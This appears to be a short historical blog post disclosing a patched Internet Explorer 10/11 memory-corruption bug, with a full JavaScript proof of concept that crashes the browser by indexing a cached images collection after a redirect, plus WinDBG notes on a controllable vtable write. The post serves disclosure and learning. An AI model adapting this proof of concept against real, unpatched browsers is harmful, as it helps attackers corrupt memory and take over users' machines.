Exploitable Crash via Cached Image Collection Access by Index

Accessing a cached element collection by numeric index after a redirect crashes the browser with EXPLOITABLE classification — EIP can be controlled by varying the number of elements added before the redirect. This is a variation of the named-element access bug, but using index-based access instead of named properties.

var _images;

function main() {
    var win = window.open("redirect.aspx", "", "width=400,height=400");
    win.setTimeout('alert("Please, do not close this alert. The browser will crash in a couple of seconds...");');

    win.document.appendChild(win.document.createElement("body"));
    win.document.body.innerHTML = '<img src=1 /><img src=2 />';

    _images = win.document.images; // Save a reference to the images collection.

    setTimeout("accessCachedImagesByIndex()", 2000);
}

function accessCachedImagesByIndex() {
    try {
        alert(_images);
    } catch(e) {
        alert(_images[0]); // Crash!
    }
}

The WinDBG session on IE10 Win8 showed a write access violation at IEFRAME!CIECredentialManagerProxyImpl with the corruption reaching into a vtable pointer — classified as EXPLOITABLE user mode write AV. Tested on IE10 / IE11 build 20130312-2100.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [UXSS via Known Named Element in Cached Forms Collection] :: [Information Disclosure: Real File Path via createRangeCollection] >